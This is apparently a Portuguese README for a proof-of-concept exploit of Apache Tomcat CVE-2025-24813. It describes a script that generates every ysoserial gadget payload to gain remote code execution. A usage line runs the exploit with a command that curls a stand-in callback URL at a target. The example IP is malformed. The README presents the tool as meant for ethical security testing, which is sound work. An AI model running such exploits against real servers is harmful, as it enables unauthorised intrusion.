
Um PoC para CVE-2025-24813
CVE-2025-24813 afeta o Apache Tomcat - se for uma versão vulnerável e estiver espetacularmente mal configurado, um invasor pode obter RCE com um GET e um POST.
Mais informações aqui
Este é o script de Yiheng An, Jun Li, Qiang Liu, Haozhe Zhang e Qi Deng, do recente artigo modificado para aceitar um comando, gerar todos os payloads de gadget ysoserial e enviá-los ao seu alvo.
Compartilhado no interesse de testes de segurança éticos.
Exemplo de uso:
python3 exploit.py --command 'curl http://yourcollaburl' --target 'http://192.168.10.0.1:8080' --proxy '127.0.0.1:8080'
poc.mp4 mostra o script em ação, gerando os payloads e enviando-os ao alvo, e no painel direito vemos o listener do interact sendo chamado.